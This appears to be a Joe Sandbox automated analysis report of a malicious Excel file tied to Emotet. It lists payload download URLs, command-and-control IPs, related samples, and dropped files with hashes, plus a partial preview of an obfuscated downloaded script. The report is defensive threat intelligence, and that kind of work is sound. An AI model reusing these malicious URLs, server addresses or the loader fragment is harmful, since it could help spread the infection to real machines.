                              http://tamiladsense.compowershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://onexone.epowershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://vn.minino.com/wp-admin/cpowershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://tunbridgeservices.com/jfoeqhxz/zOX0/powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://91.240.118.172/ee/ss/se.htmlfunctionmshta.exe, 00000006.00000003.415186421.000000000314D000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: safe
                              		unknown
                              http://manchesterheatingservices.youprocontact.com/wp-admin/AiK19uMf/powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://www.piriform.com/ccleanerpowershell.exe, 00000008.00000002.663093888.0000000000277000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                http://devbhoomigaushala.org/Getae/Vyo5rrNLAgd0QxXvkv/PE3powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                		unknown
                                http://imaginariumstore.fun/ncsb/cyGoTYqMmcRwvqdre/PE3powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                		unknown
                                https://lastregaristorante.com/wp-admin/ffdC7ElM2Bn2/powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                		unknown
                                https://secure.comodo.com/CPS0rundll32.exe, 00000011.00000002.663586016.00000000004E9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.663543768.00000000004D7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.663566714.00000000004E4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.663437430.00000000004A4000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  http://91.240.11xrundll32.exe, 0000000E.00000002.559655343.000000000032A000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		low
                                  http://crl.entrust.net/2048ca.crl0rundll32.exe, 00000011.00000002.663586016.00000000004E9000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    http://engaz.shopowershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://74.207.230.120/drundll32.exe, 00000011.00000002.663437430.00000000004A4000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown

                                    World Map of Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public IPs

                                    IPDomainCountryFlagASNASN NameMalicious
                                    207.148.81.119
                                    		unknownUnited States
                                    		20473AS-CHOOPAUStrue
                                    104.131.62.48
                                    		unknownUnited States
                                    		14061DIGITALOCEAN-ASNUStrue
                                    198.199.98.78
                                    		unknownUnited States
                                    		14061DIGITALOCEAN-ASNUStrue
                                    194.9.172.107
                                    		unknownunknown
                                    		207992FEELBFRtrue
                                    59.148.253.194
                                    		unknownHong Kong
                                    		9269HKBN-AS-APHongKongBroadbandNetworkLtdHKtrue
                                    74.207.230.120
                                    		unknownUnited States
                                    		63949LINODE-APLinodeLLCUStrue
                                    103.41.204.169
                                    		unknownIndonesia
                                    		58397INFINYS-AS-IDPTInfinysSystemIndonesiaIDtrue
                                    85.214.67.203
                                    		unknownGermany
                                    		6724STRATOSTRATOAGDEtrue
                                    191.252.103.16
                                    		unknownBrazil
                                    		27715LocawebServicosdeInternetSABRtrue
                                    168.197.250.14
                                    		unknownArgentina
                                    		264776OmarAnselmoRipollTDCNETARtrue
                                    185.148.168.15
                                    		unknownGermany
                                    		44780EVERSCALE-ASDEtrue
                                    66.42.57.149
                                    		unknownUnited States
                                    		20473AS-CHOOPAUStrue
                                    139.196.72.155
                                    		unknownChina
                                    		37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdtrue
                                    217.182.143.207
                                    		unknownFrance
                                    		16276OVHFRtrue
                                    136.0.111.15
                                    		tamiladsense.comUnited States
                                    		40676AS40676UStrue
                                    203.153.216.46
                                    		unknownIndonesia
                                    		45291SURF-IDPTSurfindoNetworkIDtrue
                                    159.69.237.188
                                    		unknownGermany
                                    		24940HETZNER-ASDEtrue
                                    116.124.128.206
                                    		unknownKorea Republic of
                                    		9318SKB-ASSKBroadbandCoLtdKRtrue
                                    37.59.209.141
                                    		unknownFrance
                                    		16276OVHFRtrue
                                    78.46.73.125
                                    		unknownGermany
                                    		24940HETZNER-ASDEtrue
                                    210.57.209.142
                                    		unknownIndonesia
                                    		38142UNAIR-AS-IDUniversitasAirlanggaIDtrue
                                    185.148.168.220
                                    		unknownGermany
                                    		44780EVERSCALE-ASDEtrue
                                    54.37.228.122
                                    		unknownFrance
                                    		16276OVHFRtrue
                                    185.168.130.138
                                    		unknownUkraine
                                    		49720GIGACLOUD-ASUAtrue
                                    190.90.233.66
                                    		unknownColombia
                                    		18678INTERNEXASAESPCOtrue
                                    142.4.219.173
                                    		unknownCanada
                                    		16276OVHFRtrue
                                    54.38.242.185
                                    		unknownFrance
                                    		16276OVHFRtrue
                                    195.154.146.35
                                    		unknownFrance
                                    		12876OnlineSASFRtrue
                                    195.77.239.39
                                    		unknownSpain
                                    		60493FICOSA-ASEStrue
                                    78.47.204.80
                                    		unknownGermany
                                    		24940HETZNER-ASDEtrue
                                    118.98.72.86
                                    		unknownIndonesia
                                    		7713TELKOMNET-AS-APPTTelekomunikasiIndonesiaIDtrue
                                    37.44.244.177
                                    		unknownGermany
                                    		47583AS-HOSTINGERLTtrue
                                    91.240.118.172
                                    		unknownunknown
                                    		49453GLOBALLAYERNLtrue
                                    62.171.178.147
                                    		unknownUnited Kingdom
                                    		51167CONTABODEtrue
                                    128.199.192.135
                                    		unknownUnited Kingdom
                                    		14061DIGITALOCEAN-ASNUStrue

                                    General Information

                                    Joe Sandbox Version:34.0.0 Boulder Opal
                                    Analysis ID:562416
                                    Start date:28.01.2022
                                    Start time:21:14:11
                                    Joe Sandbox Product:CloudBasic
                                    Overall analysis duration:0h 11m 42s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Sample file name:DOCUMENT_2801.xls
                                    Cookbook file name:defaultwindowsofficecookbook.jbs
                                    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                    Number of analysed new started processes analysed:19
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • HDC enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Detection:MAL
                                    Classification:mal100.troj.expl.evad.winXLS@25/9@1/35
                                    EGA Information:
                                    • Successful, ratio: 75%
                                    HDC Information:
                                    • Successful, ratio: 29.4% (good quality ratio 27.8%)
                                    • Quality average: 72.2%
                                    • Quality standard deviation: 25.5%
                                    HCA Information:
                                    • Successful, ratio: 100%
                                    • Number of executed functions: 43
                                    • Number of non-executed functions: 215
                                    Cookbook Comments:
                                    • Adjust boot time
                                    • Enable AMSI
                                    • Found application associated with file extension: .xls
                                    • Found Word or Excel or PowerPoint or XPS Viewer
                                    • Attach to Office via COM
                                    • Scroll down
                                    • Close Viewer

                                    Warnings

                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
                                    • Excluded IPs from analysis (whitelisted): 92.123.101.187, 92.123.101.210, 92.123.101.218, 92.123.101.179, 92.123.101.225, 92.123.101.169, 92.123.101.211
                                    • Excluded domains from analysis (whitelisted): wu-shim.trafficmanager.net, ctldl.windowsupdate.com, a767.dspw65.akamai.net, download.windowsupdate.com.edgesuite.net
                                    • Execution Graph export aborted for target mshta.exe, PID 2696 because there are no executed function
                                    • Execution Graph export aborted for target powershell.exe, PID 1708 because it is empty
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.

                                    Simulations

                                    Behavior and APIs

                                    TimeTypeDescription
                                    21:14:19API Interceptor60x Sleep call for process: mshta.exe modified
                                    21:14:22API Interceptor432x Sleep call for process: powershell.exe modified
                                    21:14:39API Interceptor205x Sleep call for process: rundll32.exe modified

                                    Joe Sandbox View / Context

                                    IPs

                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    207.148.81.119DETAILS-145.xlsGet hashmaliciousBrowse
                                      info_301.xlsGet hashmaliciousBrowse
                                        5R5Dz9UhFae3QqksIqR.dllGet hashmaliciousBrowse
                                          gqxdiBj7JLMI.dllGet hashmaliciousBrowse
                                            Ylb9.dllGet hashmaliciousBrowse
                                              HXYM4z2.dllGet hashmaliciousBrowse
                                                W5Tmx0pFkC6A.dllGet hashmaliciousBrowse
                                                  w87Hl.dllGet hashmaliciousBrowse
                                                    zvb7uw.dllGet hashmaliciousBrowse
                                                      https___lastregaristorante.com_wp-admin_ffdC7ElM2Bn2_Fri_Jan_28_10_48_23_AM_CST_2022.dllGet hashmaliciousBrowse
                                                        https___oculusvisioncare.com_wp-includes_ZEYDjosbNExFTdu_Fri_Jan_28_10_48_26_AM_CST_2022.dllGet hashmaliciousBrowse
                                                          https___mypurealsystem.com_App_Start_Rhh8lKO_Fri_Jan_28_10_48_15_AM_CST_2022.dllGet hashmaliciousBrowse
                                                            Q_2801.xlsGet hashmaliciousBrowse
                                                              X_2801.xlsGet hashmaliciousBrowse
                                                                2026P-2801.xlsGet hashmaliciousBrowse
                                                                  Mail_27012022.xlsGet hashmaliciousBrowse
                                                                    gLbGdSSQmEnKdhkSLJv.dllGet hashmaliciousBrowse
                                                                      x6eU6QrnmgTO4svU.dllGet hashmaliciousBrowse
                                                                        MrrnzVVCORolbHHw.dllGet hashmaliciousBrowse
                                                                          BR 18833597536.xlsGet hashmaliciousBrowse
                                                                            104.131.62.48DETAILS-145.xlsGet hashmaliciousBrowse
                                                                              info_301.xlsGet hashmaliciousBrowse
                                                                                5R5Dz9UhFae3QqksIqR.dllGet hashmaliciousBrowse
                                                                                  gqxdiBj7JLMI.dllGet hashmaliciousBrowse
                                                                                    Ylb9.dllGet hashmaliciousBrowse
                                                                                      HXYM4z2.dllGet hashmaliciousBrowse
                                                                                        W5Tmx0pFkC6A.dllGet hashmaliciousBrowse
                                                                                          w87Hl.dllGet hashmaliciousBrowse
                                                                                            zvb7uw.dllGet hashmaliciousBrowse
                                                                                              https___lastregaristorante.com_wp-admin_ffdC7ElM2Bn2_Fri_Jan_28_10_48_23_AM_CST_2022.dllGet hashmaliciousBrowse
                                                                                                https___oculusvisioncare.com_wp-includes_ZEYDjosbNExFTdu_Fri_Jan_28_10_48_26_AM_CST_2022.dllGet hashmaliciousBrowse
                                                                                                  https___mypurealsystem.com_App_Start_Rhh8lKO_Fri_Jan_28_10_48_15_AM_CST_2022.dllGet hashmaliciousBrowse
                                                                                                    Q_2801.xlsGet hashmaliciousBrowse
                                                                                                      X_2801.xlsGet hashmaliciousBrowse
                                                                                                        2026P-2801.xlsGet hashmaliciousBrowse
                                                                                                          Mail_27012022.xlsGet hashmaliciousBrowse
                                                                                                            gLbGdSSQmEnKdhkSLJv.dllGet hashmaliciousBrowse
                                                                                                              x6eU6QrnmgTO4svU.dllGet hashmaliciousBrowse
                                                                                                                MrrnzVVCORolbHHw.dllGet hashmaliciousBrowse
                                                                                                                  BR 18833597536.xlsGet hashmaliciousBrowse

                                                                                                                    Domains

                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                    tamiladsense.cominfo_301.xlsGet hashmaliciousBrowse
                                                                                                                    • 136.0.111.15
                                                                                                                    Q_2801.xlsGet hashmaliciousBrowse
                                                                                                                    • 136.0.111.15
                                                                                                                    2026P-2801.xlsGet hashmaliciousBrowse
                                                                                                                    • 136.0.111.15

                                                                                                                    ASNs

                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                    AS-CHOOPAUSDETAILS-145.xlsGet hashmaliciousBrowse
                                                                                                                    • 66.42.57.149
                                                                                                                    info_301.xlsGet hashmaliciousBrowse
                                                                                                                    • 66.42.57.149
                                                                                                                    5R5Dz9UhFae3QqksIqR.dllGet hashmaliciousBrowse
                                                                                                                    • 66.42.57.149
                                                                                                                    gqxdiBj7JLMI.dllGet hashmaliciousBrowse
                                                                                                                    • 66.42.57.149
                                                                                                                    Ylb9.dllGet hashmaliciousBrowse
                                                                                                                    • 66.42.57.149
                                                                                                                    HXYM4z2.dllGet hashmaliciousBrowse
                                                                                                                    • 66.42.57.149
                                                                                                                    W5Tmx0pFkC6A.dllGet hashmaliciousBrowse
                                                                                                                    • 66.42.57.149
                                                                                                                    w87Hl.dllGet hashmaliciousBrowse
                                                                                                                    • 66.42.57.149
                                                                                                                    zvb7uw.dllGet hashmaliciousBrowse
                                                                                                                    • 66.42.57.149
                                                                                                                    https___lastregaristorante.com_wp-admin_ffdC7ElM2Bn2_Fri_Jan_28_10_48_23_AM_CST_2022.dllGet hashmaliciousBrowse
                                                                                                                    • 66.42.57.149
                                                                                                                    https___oculusvisioncare.com_wp-includes_ZEYDjosbNExFTdu_Fri_Jan_28_10_48_26_AM_CST_2022.dllGet hashmaliciousBrowse
                                                                                                                    • 66.42.57.149
                                                                                                                    https___mypurealsystem.com_App_Start_Rhh8lKO_Fri_Jan_28_10_48_15_AM_CST_2022.dllGet hashmaliciousBrowse
                                                                                                                    • 66.42.57.149
                                                                                                                    Q_2801.xlsGet hashmaliciousBrowse
                                                                                                                    • 66.42.57.149
                                                                                                                    X_2801.xlsGet hashmaliciousBrowse
                                                                                                                    • 66.42.57.149
                                                                                                                    Mozi.m.3Get hashmaliciousBrowse
                                                                                                                    • 95.179.227.24
                                                                                                                    2026P-2801.xlsGet hashmaliciousBrowse
                                                                                                                    • 66.42.57.149
                                                                                                                    Mail_27012022.xlsGet hashmaliciousBrowse
                                                                                                                    • 66.42.57.149
                                                                                                                    gLbGdSSQmEnKdhkSLJv.dllGet hashmaliciousBrowse
                                                                                                                    • 66.42.57.149
                                                                                                                    x6eU6QrnmgTO4svU.dllGet hashmaliciousBrowse
                                                                                                                    • 66.42.57.149
                                                                                                                    MrrnzVVCORolbHHw.dllGet hashmaliciousBrowse
                                                                                                                    • 66.42.57.149
                                                                                                                    DIGITALOCEAN-ASNUSDETAILS-145.xlsGet hashmaliciousBrowse
                                                                                                                    • 128.199.192.135
                                                                                                                    imedpub_2.xlsGet hashmaliciousBrowse
                                                                                                                    • 162.243.175.63
                                                                                                                    imedpub_6.xlsGet hashmaliciousBrowse
                                                                                                                    • 164.90.147.135
                                                                                                                    imedpub.com_6.xlsGet hashmaliciousBrowse
                                                                                                                    • 162.243.175.63
                                                                                                                    imedpub_8.xlsGet hashmaliciousBrowse
                                                                                                                    • 164.90.147.135
                                                                                                                    imedpub.com_10.xlsGet hashmaliciousBrowse
                                                                                                                    • 162.243.175.63
                                                                                                                    iMedPub LTD_10.xlsGet hashmaliciousBrowse
                                                                                                                    • 162.243.175.63
                                                                                                                    iMedPub LTD_12.xlsGet hashmaliciousBrowse
                                                                                                                    • 162.243.175.63
                                                                                                                    iMedPub LTD_14.xlsGet hashmaliciousBrowse
                                                                                                                    • 162.243.175.63
                                                                                                                    NZW-010122 BNUV-280122.xlsmGet hashmaliciousBrowse
                                                                                                                    • 162.243.175.63
                                                                                                                    iMedPub LTD_15.xlsGet hashmaliciousBrowse
                                                                                                                    • 162.243.175.63
                                                                                                                    iMedPub LTD_2.xlsGet hashmaliciousBrowse
                                                                                                                    • 162.243.175.63
                                                                                                                    iMedPub LTD_3.xlsGet hashmaliciousBrowse
                                                                                                                    • 162.243.175.63
                                                                                                                    iMedPub LTD_7.xlsGet hashmaliciousBrowse
                                                                                                                    • 164.90.147.135
                                                                                                                    iMedPub LTD_8.xlsGet hashmaliciousBrowse
                                                                                                                    • 162.243.175.63
                                                                                                                    imedpub.xlsGet hashmaliciousBrowse
                                                                                                                    • 162.243.175.63
                                                                                                                    info_301.xlsGet hashmaliciousBrowse
                                                                                                                    • 128.199.192.135
                                                                                                                    InnovincConf_1.xlsGet hashmaliciousBrowse
                                                                                                                    • 164.90.147.135
                                                                                                                    innovinc.org.xlsGet hashmaliciousBrowse
                                                                                                                    • 164.90.147.135
                                                                                                                    ANFg7r0v2A.dllGet hashmaliciousBrowse
                                                                                                                    • 162.243.175.63

                                                                                                                    JA3 Fingerprints

                                                                                                                    No context

                                                                                                                    Dropped Files

                                                                                                                    No context

                                                                                                                    Created / dropped Files

                                                                                                                    C:\ProgramData\Milossd.dll

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):557056
                                                                                                                    Entropy (8bit):7.0041357928485235
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:6144:HUNF4UQXTkkAiBuGKDU5PSczbmOTT0DaTMGZUylbdTN1itwRClN6RfcjJxX4R0Zq:AeAa4DU5PSczbmmTzTnqyDx6BrWt
                                                                                                                    MD5:900A5B681C016FE03EECB59DBC4855A4
                                                                                                                    SHA1:A96CD94DF4DD7A76F636866E9C79E995E1175F2A
                                                                                                                    SHA-256:B77B1E649BFF7CC04B78717A35B00CE24441B09F977098B39E31A716BE5E8CAD
                                                                                                                    SHA-512:4E0FC66FC0D8672B2A7523329D4A0BC60A664EDEC062C59305DF40CADB890ADE1ED7FAE2C893445C9D199FBCECECC508349D6D3B32DA351EFB7F9A09DE1A24E1
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: C:\ProgramData\Milossd.dll, Author: Joe Security
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......hs.a,..2,..2,..2...2&..2...27..2,..2...2...26..2...2...2...2...2...2-..2...2-..2...2-..2Rich,..2................PE..L......a...........!.....P... ...............`......................................]...............................@-..R...4...........Pv................... ..0N......................................@............`..........@....................text...9E.......P.................. ..`.rdata.......`.......`..............@..@.data....e...0...0...0..............@....rsrc...Pv...........`..............@..@.reloc..v.... ......................@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\se[1].htm

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\mshta.exe
                                                                                                                    File Type:data
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):11047
                                                                                                                    Entropy (8bit):6.178820492137629
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:192:aY2WCkQxAJoZ3LRtPBOEIZkh4ShBlFbClc5dkmYsWAiurnCbNPty2P933Gi7bOaI:aYSkuXxOEkkh4glslcGbu7CbRVGradod
                                                                                                                    MD5:9CE5F4CBB12B6E393A35F5135C369C48
                                                                                                                    SHA1:934F8045C0CDE6ED88BAE93C5541808B02129C4C
                                                                                                                    SHA-256:D2F41D2E5D866522A11D6632CFBC52F9FC4649E7EFE78F588C218E5C59C4511A
                                                                                                                    SHA-512:A53D222AE62B9AC4073357E78EB0215974E05B1145AC864B60A3CC98FF15299EA3BD0C6445A9AF90FA5A7BC88435493CEF768938A70A8FCEE204F1ADC0A65AD6
                                                                                                                    Malicious:false
                                                                                                                    IE Cache URL:http://91.240.118.172/ee/ss/se.html
                                                                                                                    Preview:.......................................................................................................................................................................<html><head><meta http-equiv='x-ua-compatible' content='EmulateIE9'><script>l1l=document.documentMode||document.all;var f9f76c=true;ll1=document.layers;lll=window.sidebar;f9f76c=(!(l1l&&ll1)&&!(!l1l&&!ll1&&!lll));l_ll=location+'';l11=navigator.userAgent.toLowerCase();function lI1(l1I){return l11.indexOf(l1I)>0?true:false};lII=lI1('kht')|lI1('per');f9f76c|=lII;zLP=location.protocol+'0FD';jP645E8Mp8TPT=new Array();oV511BYRuo2ih=new Array();oV511BYRuo2ih[0]='g%78%69%6E\103%38%38\117' ;jP645E8Mp8TPT[0]='.<.!.D.O.C.T.Y.P.E. .h.t.m.l. .P.U.B.L.I.C. .".-././.W.3.C~..D.T.D. .X.H.T.M.L. .1...0. .T.r.a.n.s.i.t.i.o.n.a.l~..E.N."~.~\n.t.p.:~..w~B...w.3...o.r.g./.T.R./.x~\n~..1./~..D~N~P.l.1.-.t~-~/~1~3~5.l...d.t.d.".>.<~W. .x~.~/.=."~=~?~A~C~E~G~I./.1.9~y~V~..l~f~h.e.a.d~g.s.c.r.i.p.t.>.e.v~6.(.u.n.e}..a.p.e.(.\'.%.7.6.%.6.1.\\.1.6

                                                                                                                    C:\Users\user\AppData\Local\Temp\36E8.tmp

                                                                                                                    Download File
                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1536
                                                                                                                    Entropy (8bit):1.1464700112623651
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:YmsalTlLPltl2N81HRQjlORGt7RQ//W1XR9//3R9//3R9//:rl912N0xs+CFQXCB9Xh9Xh9X
                                                                                                                    MD5:72F5C05B7EA8DD6059BF59F50B22DF33
                                                                                                                    SHA1:D5AF52E129E15E3A34772806F6C5FBF132E7408E
                                                                                                                    SHA-256:1DC0C8D7304C177AD0E74D3D2F1002EB773F4B180685A7DF6BBE75CCC24B0164
                                                                                                                    SHA-512:6FF1E2E6B99BD0A4ED7CA8A9E943551BCD73A0BEFCACE6F1B1106E88595C0846C9BB76CA99A33266FFEC2440CF6A440090F803ABBF28B208A6C7BC6310BEB39E
                                                                                                                    Malicious:false
                                                                                                                    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Users\user\AppData\Local\Temp\~DFEE598E85DD6B8B75.TMP

                                                                                                                    Download File
                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                    File Type:data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):28672
                                                                                                                    Entropy (8bit):3.4082156922514875
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:768:XxIk3hbdlylKsgqopeJBWhZFGkE+cL2NdAJZ6ypPn:XxIk3hbdlylKsgqopeJBWhZFGkE+cL2S
                                                                                                                    MD5:20919860D1102256C795CB59C08178AE
                                                                                                                    SHA1:E5F6D7A600E9AE82F355A13342C981EBD98517CD
                                                                                                                    SHA-256:7560DC6FC4A3C43879C4087FE5806DBC6B69B9F144D5A96822020D16A407B7AA
                                                                                                                    SHA-512:DDC8B8B97D8D56629133F9FEF12C1E033933B06ECEDF815C99DE1FFE78DF15FFBF9073E00FDFA715C95D4201872EE528E54E824745152DA95C5C85CBAEE6F89E
                                                                                                                    Malicious:false
                                                                                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Users\user\AppData\Local\Temp\~DFF08D13411F7037F4.TMP

                                                                                                                    Download File
                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                    File Type:data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):512
                                                                                                                    Entropy (8bit):0.0
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3::
                                                                                                                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                    Malicious:false
                                                                                                                    Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msnu (copy)

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    File Type:data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):8016
                                                                                                                    Entropy (8bit):3.5813271999656315
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:96:chQCQMqWqvsqvJCwo5z8hQCQMqWqvsEHyqvJCworXzdTYzH6UVMWlUVjA2:cWzo5z8WnHnorXzdPUVMRA2
                                                                                                                    MD5:9EB84C4053A11C348C20FE0BEBBE23DB
                                                                                                                    SHA1:898D07BC06C9B6492DC33B6B84194CB24D7F3C6E
                                                                                                                    SHA-256:E9844BB96479944A1EC583F985D66D3AD8B7470AE060F625EFB6C92B76E9867F
                                                                                                                    SHA-512:01A40427A7E65AE489DC1832494A6D43C73D7A4C6DAB3B3E572185889DD064878EC8F127C22CEC61E6017589D5C318512B84AE2884B1589DBF27DE25A3C98C6F
                                                                                                                    Malicious:false
                                                                                                                    Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S!...Programs..f.......:...S!.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.

                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\AE0RRM4GV8COLKP8I7YS.temp

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    File Type:data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):8016
                                                                                                                    Entropy (8bit):3.5813271999656315
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:96:chQCQMqWqvsqvJCwo5z8hQCQMqWqvsEHyqvJCworXzdTYzH6UVMWlUVjA2:cWzo5z8WnHnorXzdPUVMRA2
                                                                                                                    MD5:9EB84C4053A11C348C20FE0BEBBE23DB
                                                                                                                    SHA1:898D07BC06C9B6492DC33B6B84194CB24D7F3C6E
                                                                                                                    SHA-256:E9844BB96479944A1EC583F985D66D3AD8B7470AE060F625EFB6C92B76E9867F
                                                                                                                    SHA-512:01A40427A7E65AE489DC1832494A6D43C73D7A4C6DAB3B3E572185889DD064878EC8F127C22CEC61E6017589D5C318512B84AE2884B1589DBF27DE25A3C98C6F
                                                                                                                    Malicious:false
